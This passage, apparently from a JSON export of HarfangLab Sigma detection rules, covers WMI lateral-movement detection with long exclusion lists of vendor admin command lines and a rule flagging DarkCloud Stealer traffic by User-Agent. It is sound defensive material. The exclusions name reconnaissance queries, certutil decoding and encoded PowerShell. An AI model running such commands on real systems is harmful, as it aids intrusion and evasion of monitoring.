'?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n CommandLine|contains|all:\n - ' Unrestricted '\n - '\\TEMP\\RestartHealthService.ps1 '\n\n exclusion_citrix:\n Image|endswith: '\\CtxSession.exe'\n Signed: 'true'\n Signature: 'Citrix Systems, Inc.'\n\n exclusion_stratoprobe:\n # cmd /c C:\\temp\\StratoProbe\\538834ED5E5A4AF1BC45D07F714BFFD1\\stratoStat.bat\n # cmd /c rd C:\\temp\\StratoProbe\\F4C7873327D24F6C9AA8499337A90320\n # cmd /c del C:\\temp\\StratoProbe\\C55C1EA5417F4A599C66220D15748DFD\\*.bat\n # cmd /c del C:\\temp\\StratoProbe\\538834ED5E5A4AF1BC45D07F714BFFD1\\*.txt\n # cmd /c (echo ^setlocal enabledelayedexpansion) >> 
C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\\stratoStat.bat\n # cmd /c (echo for /f delims= %%^i in ^(^!textfile^!^) do ^() >> C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\\stratoStat.bat\n # cmd /c (echo set line=!line: =~!) >> C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\\stratoStat.bat\n # cmd /c (echo set /a counter=counter+1) >> C:\\temp\\StratoProbe\\1743B701DCB242C1952F6809EF249E78\\stratoStat.bat\n # cmd /c (echo cls && echo cls) > C:\\temp\\StratoProbe\\4876911C42784D3FA87A3BA900FF64D7\\stratoStat.bat\n # cmd /c md C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\n CommandLine:\n - 'cmd /c ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n - 'cmd /c rd ?:\\temp\\StratoProbe\\\\????????????????????????????????'\n - 'cmd /c md ?:\\temp\\StratoProbe\\\\????????????????????????????????'\n - 'cmd /c del ?:\\temp\\StratoProbe\\\\????????????????????????????????\\\\?.bat'\n - 'cmd /c del ?:\\temp\\StratoProbe\\\\????????????????????????????????\\\\?.txt'\n - '* >> ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n - '* > ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n\n exclusion_netwrix:\n CommandLine:\n - 'netsh.exe advfirewall firewall add rule name=Netwrix Remote Event Log Management (RPC-EPMAP) description=Inbound rule for the RPCSS service to allow RPC/TCP traffic for the local Event Log Service. profile=Private,Public,Domain enable=yes action=allow dir=in protocol=tcp localport=RPC-EPMap service=Eventlog program=%SystemRoot%\\system32\\svchost.exe'\n - 'netsh.exe advfirewall firewall add rule name=Netwrix Remote Event Log Management (RPC) description=Inbound rule for the local Event Log service to be remotely managed via RPC/TCP. 
profile=Private,Public,Domain enable=yes action=allow dir=in protocol=tcp localport=RPC service=Eventlog program=%SystemRoot%\\system32\\svchost.exe'\n - 'netsh.exe advfirewall firewall add rule name=Netwrix Remote Event Log Management (NP-In) description=Inbound rule for the local Event Log service to be remotely managed over Named Pipes. profile=Private,Public,Domain enable=yes action=allow dir=in protocol=tcp localport=445 service=Eventlog program=System'\n - 'netsh.exe advfirewall firewall delete rule name=Netwrix Remote Event Log Management (RPC-EPMAP)'\n - 'netsh.exe advfirewall firewall delete rule name=Netwrix Remote Event Log Management (RPC)'\n - 'netsh.exe advfirewall firewall delete rule name=Netwrix Remote Event Log Management (NP-In)'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n # \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\n CommandLine|endswith:\n - ':\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n - ':\\Windows\\system32\\conhost.exe 0x4'\n\n exclusion_solarwinds:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\WINDOWS\\Temp\\\\????????-????-????-????-????????????\\GetPendingUpdates_vbs.CMD'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\WINDOWS\\Temp\\\\????????-????-????-????-????????????\\GetUpdateDates_vbs.CMD'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\GetPendingUpdates_vbs.CMD'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\GetUpdateDates_vbs.CMD'\n\n exclusion_microsoft_assessment:\n CommandLine:\n - 'cmd.exe /Q /c chcp * & reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c chcp * & reg query HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 
2>&1'\n - 'cmd.exe /Q /c cmd.exe /c dir ?:\\\\programdata\\\\regid* /b /s > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c hostname > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c mode con: cols=4096 | echo . | powershell.exe -EncodedCommand * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKEY_LOCAL_MACHINE\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Microsoft SQL Server /S > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKLM\\\\SOFTWARE\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKLM\\\\Software\\\\Microsoft\\\\Internet Explorer > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c ver > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic logicaldisk get Name, DriveType, FileSystem, Size, FreeSpace, VolumeSerialNumber /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic /namespace:\\\\\\\\root\\\\cimv2\\\\security\\\\microsofttpm path win32_tpm get * /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic path Win32_TSLicenseServer get ServerRole /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic qfe get Hotfixid /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c netsh trace start capture=yes report=disabled filemode=circular overwrite=yes maxSize=4 > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 
2>&1'\n - 'cmd.exe /Q /c netsh trace stop > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Edge\\\\BLBeacon /S > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\Software\\\\Microsoft\\\\Internet Explorer /reg:64 /S > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\Software\\\\Microsoft\\\\Microsoft SQL Server * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic /namespace:\\\\\\\\root\\\\wmi path MS_SystemInformation get SystemProductName,SystemSKU,SystemVersion /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic path win32_PointingDevice get \\* /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic path win32_VideoController get \\* /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic systemenclosure get ChassisTypes /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 
2>&1'\n\n exclusion_sms_dp:\n CommandLine:\n - 'regsvr32.exe ?:\\SMS_DP$\\sms\\bin\\smsdp.dll /s'\n - '?:\\SMS_DP$\\sms\\bin\\vcredist_x64.exe /q /norestart /log ?:\\SMS_DP$\\sms\\bin\\vcredist.log'\n\n exclusion_activebackup:\n # C:\\Users\\Administrateur\\AppData\\Local\\ActiveBackup\\49449e525dcf884caba4dc05e19a3262\\2.4.0-0023\\hyperv_helper.exe\n # C:\\Users\\Administrateur\\AppData\\Local\\ActiveBackup\\14b889f7d2adc9c0344402969f164026\\2.4.0-0023\\hyperv_helper.exe\n Image: '*\\AppData\\Local\\ActiveBackup\\\\*\\hyperv_helper.exe'\n Signed: 'true'\n Signature: 'Synology Inc.'\n\n # maybe atlassian\n exclusion_disco_remote:\n # cmd.exe /c echo FOR /F tokens=* USEBACKQ %%F IN (`!_cmd!`) DO ( >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo ) >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SETLOCAL ENABLEDELAYEDEXPANSION >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo @ECHO OFF >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo ENDLOCAL >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET output=!output:=\"! >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo reg add HKLM\\SOFTWARE\\Discovery-Tool /v OutStr!count! /t REG_MULTI_SZ /f /d !output! 
>> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET output=%%F >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET /a count=!count!+1 >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET count=100000 >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET _cmd=sqlcmd -E -Q ^SELECT DB.name, SUM(CASE WHEN type = 0 THEN MF.size * 8 / 1024 ELSE 0 END) AS DataFileSizeMB, SUM(CASE WHEN type = 1 THEN MF.size * 8 / 1024 ELSE 0 END) AS LogFileSizeMB, @@servicename AS InstanceName, (SELECT TOP 1 local_tcp_port FROM sys.dm_exec_connections WHERE local_tcp_port IS NOT NULL ORDER BY last_read DESC) AS Port FROM sys.master_files MF JOIN sys.databases DB ON DB.database_id = MF.database_id GROUP BY DB.name^ >> %userprofile%\\discoRemote.cmd\n CommandLine:\n - 'cmd.exe /c echo *>> %userprofile%\\discoRemote.cmd'\n - 'cmd.exe /c del %userprofile%\\discoRemote.cmd /F /Q'\n - 'cmd.exe /c %userprofile%\\discoRemote.cmd'\n - 'cmd.exe /c reg delete HKLM\\SOFTWARE\\Discovery-Tool /f'\n\n exclusion_legit:\n CommandLine:\n - 'powershell.exe -noprofile -noninteractive -Command Remove-NetTransportFilter -SettingName InternetCustom -Confirm:$false'\n - 'powershell.exe -noprofile -noninteractive -Command Set-NetTCPSetting -SettingName InternetCustom -CongestionProvider Default'\n\n exclusion_sysid:\n CommandLine:\n - 'cmd.exe /c mkdir ?:\\temp\\sysId'\n - 'cmd.exe /c del /s /q ?:\\Windows\\TEMP\\sysId'\n # cmd.exe /c C:\\temp\\sysId\\getSystemId.exe | find System ID >> C:\\temp\\sysId\\83d93175-6871-4871-b655-95a81df524e0.txt\n - 'cmd.exe /c ?:\\temp\\sysId\\getSystemId.exe | find System ID >> ?:\\temp\\sysId\\\\*'\n - 'cmd.exe /c rd /s /q ?:\\temp\\sysId'\n # cmd.exe /c mkdir C:\\Windows\\TEMP\\8a5849f41ed8\" && attrib +H C:\\Windows\\TEMP\\8a5849f41ed8\"\n - 'cmd.exe /c mkdir ?:\\Windows\\TEMP\\\\????????????\" && attrib +H ?:\\Windows\\TEMP\\\\????????????\"'\n - 'cmd.exe /c mkdir ?:\\Windows\\TEMP\\\\????????????\" && attrib +H ?:\\Windows\\TEMP\\\\????????????\"' # 
double space\n # cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Dell Computer Corporation\\iDRAC Service Module /s >> C:\\Windows\\TEMP\\\\ExtendedDID_ISM_Version_2022-11-15-05-39-30-094.txt\n - 'cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Dell Computer Corporation\\iDRAC Service Module /s >> ?:\\Windows\\TEMP\\\\*ExtendedDID_ISM_Version_*'\n - 'cmd.exe /c rmdir /S /Q ?:\\Windows\\TEMP\\\\*'\n # cmd.exe /c omreport storage controller -fmt xml -outc C:\\WINDOWS\\TEMP\\6c4ac9e37c5d\\cntrl.xml\n # cmd.exe /c omreport system esmlog -fmt xml -outc C:\\WINDOWS\\TEMP\\6c4ac9e37c5d\\ESMLog.xml\n - 'cmd.exe /c omreport * -outc *'\n - 'cmd.exe /c omreport.exe about'\n - 'cmd.exe /c iscli -pinfo'\n - 'cmd.exe /c iscli -i'\n - 'cmd.exe /c iscsicli ListInitiators'\n - 'cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Dell Computer Corporation\\OpenManage\\Applications\\SystemsManagement /s >> ?:\\WINDOWS\\TEMP\\\\*'\n - 'cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Dell Computer Corporation\\OpenManage\\Applications\\SystemsManagement /s >> ?:\\WINDOWS\\TEMP\\\\*'\n - 'cmd.exe /c driverquery'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*QlogicFCHBA_*'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*OSSummary_*'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*InstalledApplicationRegistry_*'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*Windows_ISCSI_*'\n\n # cmd.exe /c C:\\WINDOWS\\TEMP\\6d43b83c43ef\\\\omsaRaidCntrlLogs.bat C:\\WINDOWS\\TEMP\\6d43b83c43ef\\\n - 'cmd.exe /c ?:\\WINDOWS\\TEMP\\\\*\\omsaRaidCntrlLogs.bat ?:\\WINDOWS\\TEMP\\\\*'\n - 'cmd.exe /c -enc=UTF-8 -outc=?:\\WINDOWS\\TEMP\\\\????????????\\Inventory.xml'\n\n exclusion_temp_gpupdate_task:\n CommandLine:\n - 'schtasks.exe /delete /f /tn Temp_GPUpdate_Task'\n - 'schtasks.exe /run /i /tn Temp_GPUpdate_Task'\n # schtasks.exe /create /RU xxx\\yyy /SC DAILY /SD 03/14/2023 /ST 00:02 /ED 03/15/2023 /Z /F /TN Temp_GPUpdate_Task /TR cmd /c echo N | gpupdate 
/force\n - 'schtasks.exe /create /RU * /TN Temp_GPUpdate_Task /TR cmd /c echo N | gpupdate /force'\n\n exclusion_csat:\n CommandLine:\n - 'cmd /c mkdir ?:\\windows\\Temp\\csat'\n - 'cmd /c rmdir ?:\\Windows\\Temp\\csat /q /s'\n - 'cmd /c ?:\\Windows\\Temp\\csat\\csat_dwnldr.exe * -f ?:\\Windows\\Temp\\csat\\csat.exe'\n - 'cmd /c echo *> ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.exe.config'\n - 'cmd /c echo *> ?:\\WINDOWS\\Temp\\csat\\csat.exe.config'\n - 'cmd /c echo *> ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.txt'\n - 'cmd /c certutil -f -decode ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.txt ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.exe'\n - '?:\\WINDOWS\\Temp\\csat\\csat.exe *ipv4=*'\n\n exclusion_commvault:\n Image|endswith: '\\CVMedia\\setup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n ProcessSigned: 'true'\n\n exclusion_nessus:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c *> ?:\\Windows\\TEMP\\nessus_*'\n\n exclusion_advancedauditpolicybackup:\n CommandLine: 'auditpol.exe /backup /file:?:\\Windows\\Temp\\AdvancedAuditPolicyBackup.csv'\n\n exclusion_veritas_backup:\n CommandLine|contains: '*\\strpimon.exe /k SOFTWARE\\Veritas\\SymcInstall /i setup.exe *; /DEST:?:\\Program Files\\Veritas\\Backup Exec'\n\n exclusion_fstmp:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\temp\\fstmp\\fs_action_*.bat'\n\n exclusion_schtasks_tmp_gpupdate:\n CommandLine: 'schtasks.exe /create * /TN Temp_GPUpdate_Task /TR cmd /c echo N | gpupdate /Target:User /force'\n\n exclusion_healthservicerestart:\n CommandLine|startswith: 'powershell.exe ?:\\Windows\\TEMP\\RestartHealthService.ps1'\n\n exclusion_nessus_ad_join:\n CommandLine|contains:\n # $joinInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ptrJoinInfo, [System.Type][NetAPI32+DSREG_JOIN_INFO]\n - 
'JABqAG8AaQBuAEkAbgBmAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAHUAYwB0AHUAcgBlACgAJABwAHQAcgBKAG8AaQBuAEkAbgBmAG8ALAAgAFsAUwB5AHMAdABlAG0ALgBUAHkAcABlAF0AWwBOAGUAdABBAFAASQAzADIAKwBEAFMAUgBFAEcAXwBKAE8ASQBOAF8ASQBOAEYATwBdACkA'\n - 'QAagBvAGkAbgBJAG4AZgBvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AFAAdAByAFQAbwBTAHQAcgB1AGMAdAB1AHIAZQAoACQAcAB0AHIASgBvAGkAbgBJAG4AZgBvACwAIABbAFMAeQBzAHQAZQBtAC4AVAB5AHAAZQBdAFsATgBlAHQAQQBQAEkAMwAyACsARABTAFIARQBHAF8ASgBPAEkATgBfAEkATgBGAE8AXQApA'\n - 'kAGoAbwBpAG4ASQBuAGYAbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBQAHQAcgBUAG8AUwB0AHIAdQBjAHQAdQByAGUAKAAkAHAAdAByAEoAbwBpAG4ASQBuAGYAbwAsACAAWwBTAHkAcwB0AGUAbQAuAFQAeQBwAGUAXQBbAE4AZQB0AEEAUABJADMAMgArAEQAUwBSAEUARwBfAEoATwBJAE4AXwBJAE4ARgBPAF0AKQ'\n\n exclusion_vcredist:\n CommandLine|endswith:\n - '\\vc-redist-x*.exe /quiet /norestart'\n - '\\vc_redist-x*.exe /quiet /norestart'\n - '\\vc_redist.x*.exe /q /norestart'\n - '\\vc-redist.x*.exe /q /norestart'\n\n exclusion_pwsh_installer:\n CommandLine|endswith: 'powershell.exe -windowstyle hidden *\\Installer-APPS.ps1 -PackageType * -PackageName * -PackageVersion *'\n\n exclusion_uninstall_package_cache:\n CommandLine: 'cmd.exe /c for /r ?:\\ProgramData\\Package Cache* a a /uninstall /quiet /norestart AP_UNINSTALL_CODE=*'\n\n exclusion_evolucare_1:\n Image|endswith: '\\NginxGateway.exe'\n Company: 'Evolucare'\n Product: 'Ecs.Registry.NginxGateway.Console'\n\n exclusion_evolucare_2:\n CommandLine|contains: '\\\\*-*-*-*-*.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /DIR=*\\Evolucare\\'\n\n exclusion_fortinet:\n CommandLine|endswith: 'x64_FortiClient_EMS_*_Installer.ps1'\n\n exclusion_vagrant:\n CommandLine|startswith: 
'?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand'\n User|endswith: '\\vagrant'\n\n # Siemens Healthcare GmbH\n exclusion_siemens:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\SysMgmt\\service\\mwtools\\SD_Installer_Start.cmd'\n\n exclusion_arcgis:\n CommandLine|contains:\n - 'sc.exe qc Portal for ArcGIS'\n - '\\Portal_for_ArcGIS_Windows'\n - '\\ArcGIS_Server_Windows'\n\n #trap {\n # $wrapper_path = \"$($env:TEMP)\\ansible-async-wrapper-error-\n exclusion_ansible_powershell:\n Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'IAAgACAAIAB0AHIAYQBwACAAewAKACAAIAAgACAAIAAgACAAIAAkAHcAcgBhAHAAcABlAHIAXwBwAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBUAEUATQBQACkAXABhAG4AcwBpAGIAbABlAC0AYQBzAHkAbgBjAC0AdwByAGEAcABwAGUAcgAtAGUAcgByAG8AcgAtA'\n - 'AAIAAgACAAdAByAGEAcAAgAHsACgAgACAAIAAgACAAIAAgACAAJAB3AHIAYQBwAHAAZQByAF8AcABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoAVABFAE0AUAApAFwAYQBuAHMAaQBiAGwAZQAtAGEAcwB5AG4AYwAtAHcAcgBhAHAAcABlAHIALQBlAHIAcgBvAHIALQ'\n - 'gACAAIAAgAHQAcgBhAHAAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAdwByAGEAcABwAGUAcgBfAHAAYQB0AGgAIAA9ACAAIgAkACgAJABlAG4AdgA6AFQARQBNAFAAKQBcAGEAbgBzAGkAYgBsAGUALQBhAHMAeQBuAGMALQB3AHIAYQBwAHAAZQByAC0AZQByAHIAbwByAC0A'\n\n exclusion_servicenow:\n CommandLine|contains:\n - '> \\\\\\\\127.0.0.1\\c$\\temp\\\\*\\psscript_output_*.txt 2>&1'\n - '2>\\\\\\\\127.0.0.1\\admin$\\temp\\psscript_err_*.txt'\n\n exclusion_tenable:\n CommandLine|contains|all:\n - 'sc.exe start tenable_mw_scan'\n - 'output=nessus_'\n\n exclusion_scc:\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\SCC-Remote\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61760ce9-0e79-4360-81e4-a0c50dab9c8c",
"rule_name": "Possible Lateral Movement via WMI",
"rule_description": "Detects processes spawned by the Windows Management Instrumentation (WMI) service, specifically when the parent process is \"wmiprvse.exe\".\nWMI is a legitimate management tool used for system administration, but attackers may abuse this mechanism for lateral movement, persistence, or to execute malicious commands. This rule focuses on detecting potentially malicious use by monitoring the spawned processes.\nIt is recommended to review the actions of the child processes to identify any suspicious activities and to verify if the processes align with legitimate management tasks.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1059.001",
"attack.t1059.005",
"attack.t1059.007",
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61825073-0741-4211-93c9-8a32e4455793",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603202Z",
"creation_date": "2026-03-23T11:45:34.603205Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603213Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/",
"https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/"
],
"name": "t1071_001_darkcloud_stealer_url_request.yml",
"content": "title: URL Request Related to DarkCloud Stealer\nid: 61825073-0741-4211-93c9-8a32e4455793\ndescription: |\n Detects URL requests with a specific User-Agent associated with the DarkCloud Stealer.\n DarkCloud is a Windows-based information stealer, that was first identified in 2022, known for stealing passwords, banking details, and other sensitive data.\n It is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\nreferences:\n - https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/\n - https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/\ndate: 2025/08/25\nmodified: 2025/09/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Stealer.DarkCloud\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n UserAgent: 'Project1'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61825073-0741-4211-93c9-8a32e4455793",
"rule_name": "URL Request Related to DarkCloud Stealer",
"rule_description": "Detects URL requests with a specific User-Agent associated with the DarkCloud Stealer.\nDarkCloud is a Windows-based information stealer that was first identified in 2022, known for stealing passwords, banking details, and other sensitive data.\nIt is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-09-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6199a4d5-4143-4df6-a486-94005a5bb643",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625714Z",
"creation_date": "2026-03-23T11:45:34.625717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625721Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d",
"https://github.com/3lp4tr0n/SessionHop/",
"https://projectzero.google/2016/01/raising-dead.html",
"https://attack.mitre.org/techniques/T1656/"
],
